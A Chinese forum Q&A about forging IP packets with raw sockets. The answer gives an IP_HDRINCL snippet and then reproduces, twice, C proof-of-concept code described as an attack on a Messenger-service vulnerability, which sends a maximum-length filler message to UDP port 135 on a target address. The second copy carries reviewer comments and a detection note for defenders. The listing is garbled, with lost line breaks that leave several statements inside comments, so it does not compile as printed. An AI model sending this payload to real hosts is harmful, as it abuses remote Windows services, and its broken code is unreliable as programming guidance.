如何发送自己伪造的ip包?为什么我伪造的ip包的部分字段生效,而大部分字段仍由系统自动生成
如何发送自己伪造的ip包?为什么我伪造的ip包只有部分字段生效,而大部分字段仍由系统自动生成??我用的是socket,选择的是SOCK_RAW,这样做对吗?
解决方案 »
自己伪造ip包要设置:bool flag=true;setsockopt(sock,IPPROTO_IP,IP_HDRINCL,(char *)&flag,sizeof(flag)); (注意:即使设置了 IP_HDRINCL,协议栈通常仍会自行填写首部校验和等部分字段;另外,下面贴出的代码并没有使用原始套接字,而是用普通的 UDP 套接字发送数据。)
/*在VC++下编译成功,已加入:#pragma comment( lib, "ws2_32.lib" ) usage: mof.exe ip*/#include <stdio.h>#include <winsock.h>#include <string.h>#include <time.h>#pragma comment( lib, "ws2_32.lib" ) // Packet format found thanks to a bit a sniffingstatic unsigned char packet_header[] ="\x04\x00\x28\x00""\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00""\x00\x00\x00\x00\xf8\x91\x7b\x5a\x00\xff\xd0\x11\xa9\xb2\x00\xc0""\x4f\xb6\xe6\xfc""\xff\xff\xff\xff" // @40 : unique id over 16 bytes ?"\xff\xff\xff\xff""\xff\xff\xff\xff""\xff\xff\xff\xff""\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00""\x00\x00\xff\xff\xff\xff""\xff\xff\xff\xff" // @74 : fields length"\x00\x00";unsigned char field_header[] ="\xff\xff\xff\xff" // @0 : field length"\x00\x00\x00\x00""\xff\xff\xff\xff"; // @8 : field lengthint main(int argc,char *argv[]){ int i, packet_size, fields_size, s; unsigned char packet[8192]; struct sockaddr_in addr; // A few conditions : // 0 <= strlen(from) + strlen(machine) <= 56 // max fields size 3992 char from[] = "RECCA"; char machine[] = "ZEUS"; char body[4096] = "Just for test";//*** MESSAGE *** WSADATA wsaData; WSAStartup(0x0202, &wsaData); ZeroMemory(&addr, sizeof(addr)); addr.sin_family = AF_INET; addr.sin_addr.s_addr = inet_addr(argv[1]); //target ip address addr.sin_port = htons(135); ZeroMemory(packet, sizeof(packet)); packet_size = 0; memcpy(&packet[packet_size], packet_header, sizeof(packet_header) - 1); packet_size += sizeof(packet_header) - 1; i = strlen(from) + 1; *(unsigned int *)(&field_header[0]) = i; *(unsigned int *)(&field_header[8]) = i; memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1); packet_size += sizeof(field_header) - 1; strcpy(&packet[packet_size], from); 
packet_size += (((i - 1) >> 2) + 1) << 2; // padded to a multiple of 4 i = strlen(machine) + 1; *(unsigned int *)(&field_header[0]) = i; *(unsigned int *)(&field_header[8]) = i; memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1); packet_size += sizeof(field_header) - 1; strcpy(&packet[packet_size], machine); packet_size += (((i - 1) >> 2) + 1) << 2; // padded to a multiple of 4 fprintf(stdout, "Max 'body' size (incl. terminal NULL char) = %d\n", 3992 - packet_size + sizeof(packet_header) - sizeof(field_header)); memset(body, 0x14, sizeof(body)); body[3992 - packet_size + sizeof(packet_header) - sizeof(field_header) - 1] = '\0'; i = strlen(body) + 1; *(unsigned int *)(&field_header[0]) = i; *(unsigned int *)(&field_header[8]) = i; memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1); packet_size += sizeof(field_header) - 1; strcpy(&packet[packet_size], body); packet_size += i; fields_size = packet_size - (sizeof(packet_header) - 1); *(unsigned int *)(&packet[40]) = time(NULL); *(unsigned int *)(&packet[74]) = fields_size; fprintf(stdout, "Total length of strings = %d\nPacket size = %d\nFields size = %d\n", strlen(from) + strlen(machine) + strlen(body), packet_size, fields_size);/* for (i = 0; i < packet_size; i++) { if (i && ((i & 1) == 0)) fprintf(stdout, " "); if (i && ((i & 15) == 0)) fprintf(stdout, "\n"); fprintf(stdout, "%02x", packet[i]); } fprintf(stdout, "\n");*/ if ((s = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1) exit(EXIT_FAILURE); if (sendto(s, packet, packet_size, 0, (struct sockaddr *)&addr, sizeof(addr)) == -1) exit(EXIT_FAILURE);/* if (recvfrom(s, packet, sizeof(packet) - 1, 0, NULL, NULL) == -1) exit(EXIT_FAILURE);*/ exit(EXIT_SUCCESS);}
这是一段针对 Messenger 服务漏洞的攻击代码:它用普通的 UDP 套接字向 135 端口发送一条按最大长度填充的消息,并没有使用原始套接字或 IP_HDRINCL,因此并不涉及伪造 IP 首部。
// Fragment from the answer: sets the IP_HDRINCL option (level IPPROTO_IP) on
// `sock`, telling the IP layer that the caller supplies the IP header itself.
// `sock` is declared outside this fragment.
// NOTE(review): Winsock documents boolean socket options as int-sized
// (BOOL/DWORD); a one-byte C++ bool passed with optlen 1 may not be accepted.
// TODO confirm against the platform documentation.
// NOTE(review): the return value of setsockopt() is discarded, so a rejected
// option goes unnoticed and the stack keeps building the header itself.
// NOTE(review): even with the option set, the stack typically still fills in
// some header fields (the header checksum, for one), and raw sockets normally
// need administrative rights; verify the exact rules for the target OS.
bool flag=true;
setsockopt(sock,IPPROTO_IP,IP_HDRINCL,(char *)&flag,sizeof(flag));
usage: mof.exe ip*/#include <stdio.h>
#include <winsock.h>
#include <string.h>
#include <time.h>#pragma comment( lib, "ws2_32.lib" ) // Packet format found thanks to a bit a sniffing
/*
 * Proof-of-concept posted in the thread, which describes it as code that
 * attacks a Messenger-service vulnerability. It assembles one message (a fixed
 * header followed by three length-prefixed string fields: sender, machine,
 * body) and sends it as a single UDP datagram to port 135 of the address
 * given in argv[1].
 *
 * NOTE(review): it opens an ordinary SOCK_DGRAM socket, never a raw socket,
 * and never sets IP_HDRINCL, so no IP header field is forged by this code.
 * NOTE(review): line breaks were lost when the listing was extracted. Several
 * statements now sit inside trailing // comments (the main() signature and
 * the WSAStartup()/ZeroMemory() calls among them), so the text does not
 * compile as printed.
 * NOTE(review): exit() and EXIT_* are used but <stdlib.h> is not among the
 * headers the listing includes.
 * Defender note: the constant 80-byte header below and the long run of 0x14
 * bytes in the body are fixed byte patterns in this tool's traffic;
 * unsolicited inbound UDP to port 135 carrying them is a reasonable thing to
 * alert on or block at the network boundary.
 */
static unsigned char packet_header[] =
"\x04\x00\x28\x00"
"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\xf8\x91\x7b\x5a\x00\xff\xd0\x11\xa9\xb2\x00\xc0"
"\x4f\xb6\xe6\xfc"
"\xff\xff\xff\xff" // @40 : unique id over 16 bytes ?
"\xff\xff\xff\xff"
"\xff\xff\xff\xff"
"\xff\xff\xff\xff"
"\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\xff\xff\xff\xff"
"\xff\xff\xff\xff" // @74 : fields length
"\x00\x00";unsigned char field_header[] =
// field_header is the 12-byte prefix written before every string field. Its
// two 0xff placeholders (@0 and @8) are overwritten in place with the field
// length before each copy, so this global is mutable shared state.
"\xff\xff\xff\xff" // @0 : field length
"\x00\x00\x00\x00"
"\xff\xff\xff\xff"; // @8 : field lengthint main(int argc,char *argv[])
{
int i, packet_size, fields_size, s;
unsigned char packet[8192];
struct sockaddr_in addr;
// A few conditions :
// 0 <= strlen(from) + strlen(machine) <= 56
// max fields size 3992
// Sender and machine names carried in the first two fields.
char from[] = "RECCA";
char machine[] = "ZEUS";
// NOTE(review): everything after the // on the next line is comment text as
// printed, so the WSADATA declaration, WSAStartup() and ZeroMemory(&addr) are
// not compiled; the WSAStartup() return value is not checked in any case.
char body[4096] = "Just for test";//*** MESSAGE *** WSADATA wsaData; WSAStartup(0x0202, &wsaData); ZeroMemory(&addr, sizeof(addr));
addr.sin_family = AF_INET;
// NOTE(review): argv[1] is read without checking argc, and the result of
// inet_addr() is not tested for failure (INADDR_NONE on a malformed address).
addr.sin_addr.s_addr = inet_addr(argv[1]); //target ip address
addr.sin_port = htons(135); ZeroMemory(packet, sizeof(packet));
// sizeof(...) - 1 leaves out the NUL terminator that the string-literal
// initializer appends, so exactly the listed header bytes are copied.
packet_size = 0; memcpy(&packet[packet_size], packet_header, sizeof(packet_header) - 1);
packet_size += sizeof(packet_header) - 1; i = strlen(from) + 1;
// Field 1 (sender): both length slots get strlen + 1, i.e. the terminator is
// counted. NOTE(review): storing through a cast unsigned int * assumes a
// 4-byte unsigned int in host byte order and is type punning on an unsigned
// char array, which the C standard does not guarantee to work.
*(unsigned int *)(&field_header[0]) = i;
*(unsigned int *)(&field_header[8]) = i;
memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1);
packet_size += sizeof(field_header) - 1;
// NOTE(review): strcpy() into an unsigned char buffer is a pointer-sign
// mismatch; the copy is bounded only because `from` is a short fixed string.
strcpy(&packet[packet_size], from);
// Advances by the field length rounded up to the next multiple of 4; the gap
// stays zero because packet was cleared beforehand.
packet_size += (((i - 1) >> 2) + 1) << 2; // padded to a multiple of 4 i = strlen(machine) + 1;
// Field 2 (machine): same prefix-then-string layout as field 1.
*(unsigned int *)(&field_header[0]) = i;
*(unsigned int *)(&field_header[8]) = i;
memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1);
packet_size += sizeof(field_header) - 1;
strcpy(&packet[packet_size], machine);
packet_size += (((i - 1) >> 2) + 1) << 2; // padded to a multiple of 4 fprintf(stdout, "Max 'body' size (incl. terminal NULL char) = %d\n", 3992 - packet_size + sizeof(packet_header) - sizeof(field_header));
// Discards the initial "Just for test" text: body is filled with 0x14 bytes
// and terminated at the computed maximum, so the body field always has the
// largest size that the 3992-byte fields budget noted above leaves.
memset(body, 0x14, sizeof(body));
body[3992 - packet_size + sizeof(packet_header) - sizeof(field_header) - 1] = '\0'; i = strlen(body) + 1;
// Field 3 (body): same prefix, but the length is added without rounding.
*(unsigned int *)(&field_header[0]) = i;
*(unsigned int *)(&field_header[8]) = i;
memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1);
packet_size += sizeof(field_header) - 1;
strcpy(&packet[packet_size], body);
packet_size += i; fields_size = packet_size - (sizeof(packet_header) - 1);
// Only the first 4 bytes of the 16-byte id slot at @40 are replaced (with the
// current time, truncated to unsigned int); the other 12 bytes stay 0xff.
*(unsigned int *)(&packet[40]) = time(NULL);
// NOTE(review): offset 74 is not a multiple of 4, so this store is misaligned
// whenever packet itself is 4-byte aligned (tolerated on x86, not portable).
// NOTE(review): the fprintf passes a size_t (the strlen sum) to %d, a format
// mismatch. The /* at the end of the line opens a disabled hex dump of packet.
*(unsigned int *)(&packet[74]) = fields_size; fprintf(stdout, "Total length of strings = %d\nPacket size = %d\nFields size = %d\n", strlen(from) + strlen(machine) + strlen(body), packet_size, fields_size);/*
for (i = 0; i < packet_size; i++)
{
if (i && ((i & 1) == 0))
fprintf(stdout, " ");
if (i && ((i & 15) == 0))
fprintf(stdout, "\n");
fprintf(stdout, "%02x", packet[i]);
}
fprintf(stdout, "\n");
*/
// Plain UDP socket: the operating system builds the IP and UDP headers.
// NOTE(review): the handle is kept in an int and compared with -1, where
// Winsock documents SOCKET and INVALID_SOCKET/SOCKET_ERROR; the socket is
// never closed and WSACleanup() is never called before the process exits.
if ((s = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1)
exit(EXIT_FAILURE); if (sendto(s, packet, packet_size, 0, (struct sockaddr *)&addr, sizeof(addr)) == -1)
exit(EXIT_FAILURE);
// The receive below is disabled, so the program sends one datagram and exits
// without reading any reply.
/*
if (recvfrom(s, packet, sizeof(packet) - 1, 0, NULL, NULL) == -1)
exit(EXIT_FAILURE);
*/ exit(EXIT_SUCCESS);
}